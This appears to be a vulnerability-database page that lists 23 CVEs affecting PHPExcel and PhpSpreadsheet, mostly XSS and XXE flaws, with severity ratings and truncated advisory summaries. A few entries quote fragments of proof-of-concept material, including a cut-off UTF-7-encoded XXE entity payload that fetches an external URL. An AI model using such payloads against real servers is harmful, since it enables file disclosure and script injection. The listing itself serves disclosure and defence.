Phpoffice Phpexcel vulnerabilities

23 known vulnerabilities affecting phpoffice/phpexcel.

Total CVEs: 23
CISA KEV: 0
Public exploits: 2
Exploited in wild: 0
Severity breakdown: HIGH 12, MEDIUM 11

Vulnerabilities

Page 1 of 2

CVE | Severity | Affected versions | Date
CVE-2025-23210 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2025-02-03
CVE-2025-23210 [MEDIUM] CWE-79: PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters. Product: PhpSpreadsheet. Version: 3.8.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). CVSS vector v4.0: 4.8 (AV:N/AC:L/AT:N/PR:L
CVE-2025-22131 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2025-01-21
CVE-2025-22131 [MEDIUM] CWE-79: Cross-Site Scripting (XSS) vulnerability in generateNavigation() function in PhpSpreadsheet. Summary: The researcher discovered a zero-day Cross-Site Scripting (XSS) vulnerability in the code which translates the XLSX file into an HTML representation and displays it in the response. Details: When generating the HTML from an xlsx file containing multiple she
CVE-2024-56366 | HIGH | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56366 [HIGH] CWE-79: PhpSpreadsheet allows unauthorized Reflected XSS in the `Accounting.php` file. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N). CVSS vector v4.0: 8.3 (AV:N/A
CVE-2024-56365 | HIGH | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56365 [HIGH] CWE-79: PhpSpreadsheet allows unauthorized Reflected XSS in the constructor of the `Downloader` class. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U
CVE-2024-56408 | HIGH | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56408 [HIGH] CWE-79: PhpSpreadsheet allows unauthorized Reflected XSS in the `Convert-Online.php` file. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N). CVSS vector v4.0: 8.3 (AV:
CVE-2024-56409 | HIGH | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56409 [HIGH] CWE-79: PhpSpreadsheet allows unauthorized Reflected XSS in the `Currency.php` file. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N). CVSS vector v4.0: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A
CVE-2024-56411 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56411 [MEDIUM] CWE-79: PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').
CVE-2024-56410 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56410 [MEDIUM] CWE-79: PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability in custom properties. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). CVSS vecto
CVE-2024-56412 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2025-01-03
CVE-2024-56412 [MEDIUM] CWE-79: PhpSpreadsheet allows bypassing the XSS sanitizer using the javascript protocol and special characters. Product: PhpSpreadsheet. Version: 3.6.0. CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). CVSS vector v3.1: 5.4 (AV:N/AC:L/P
CVE-2024-47873 | HIGH | ≥ 0, ≤ 1.8.2 | 2024-11-18
CVE-2024-47873 [HIGH] CWE-611: XmlScanner bypass leads to XXE. Summary: The XmlScanner class (https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a scan method (https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) which should prevent XXE attacks. However, the regexes used in th
CVE-2024-48917 | HIGH (CVSS 7.5) | ≥ 0, ≤ 1.8.2 | 2024-11-18
CVE-2024-48917 [HIGH] CWE-611: XXE in PHPSpreadsheet's XLSX reader. Summary: The XmlScanner class (https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a scan method (https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) which should prevent XXE attacks. However, we found an
CVE-2015-3542 | HIGH | ≥ 0, < 1.8.1 | 2024-11-07
CVE-2015-3542 [HIGH] CWE-611: PHPExcel XXE Vulnerability.
CVE-2024-45293 | HIGH (PoC available) | ≥ 0, ≤ 1.8.2 | 2024-10-07
CVE-2024-45293 [HIGH] CWE-611: XXE in PHPSpreadsheet's XLSX reader. Summary: The security scanner responsible for preventing XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing whitespace. On servers that allow users to upload their own Excel (XLSX) sheets, server files and sensitive information can be disclosed by providing a crafted sheet. Details: The security scan function in `src/PhpSpreadsheet/Reader/
CVE-2024-45290 | HIGH | ≥ 0, ≤ 1.8.2 | 2024-10-07
CVE-2024-45290 [HIGH] CWE-36: PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery when opening XLSX file. Summary: It's possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially craf
CVE-2024-45292 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2024-10-07
CVE-2024-45292 [MEDIUM] CWE-79: PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via JavaScript hyperlinks. Summary: `\PhpOffice\PhpSpreadsheet\Writer\Html` does not sanitize "javascript:" URLs from hyperlink `href` attributes, resulting in a Cross-Site Scripting vulnerability. PoC: Example target script: ``` load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadsheet\Wri
CVE-2024-45060 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2024-10-07
CVE-2024-45060 [MEDIUM] CWE-79: PhpSpreadsheet has an Unauthenticated Cross-Site Scripting (XSS) in sample file. Summary: One of the sample scripts in PhpSpreadsheet is susceptible to a cross-site scripting (XSS) vulnerability due to improper handling of input where a number is expected, leading to formula injection. Details: The following code (https://github.com/PHPOffice/PhpSpreadsheet/blob/d50b8b5de7e30439
CVE-2024-45291 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2024-10-07
CVE-2024-45291 [MEDIUM] CWE-22: PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery in HTML writer when embedding images is enabled. Summary: It's possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in the HTML writer with `$writer->setEmbedImages(true);`, those files wil
CVE-2024-45048 | HIGH | ≥ 0, ≤ 1.8.2 | 2024-08-29
CVE-2024-45048 [HIGH] CWE-611: XXE in PHPSpreadsheet encoding is returned. Summary: Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack). Details: The check `$pattern = '/encoding="(.*?)"/';` is easy to bypass. Just use a single quote symbol `'`. So the payload looks like this: ``` +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/fil
CVE-2024-45046 | MEDIUM | ≥ 0, ≤ 1.8.2 | 2024-08-29
CVE-2024-45046 [MEDIUM] CWE-79: PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information. Summary: `\PhpOffice\PhpSpreadsheet\Writer\Html` doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page. PoC: Example target script: ``` load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadshee
CVE-2014-2054 | MEDIUM | ≥ 0, < 1.8.0 | 2022-05-17
CVE-2014-2054 [MEDIUM] CWE-611: PHPExcel vulnerable to XXE attacks through libxml. PHPExcel before 1.8.0, as used in ownCloud Server before 5.0.15 and 6.0.x before 6.0.2, does not disable external entity loading in libxml, which allows remote attackers to read arbitrary files, cause a denial of service, or possibly have other impact via an XML External Entity (XXE) attack.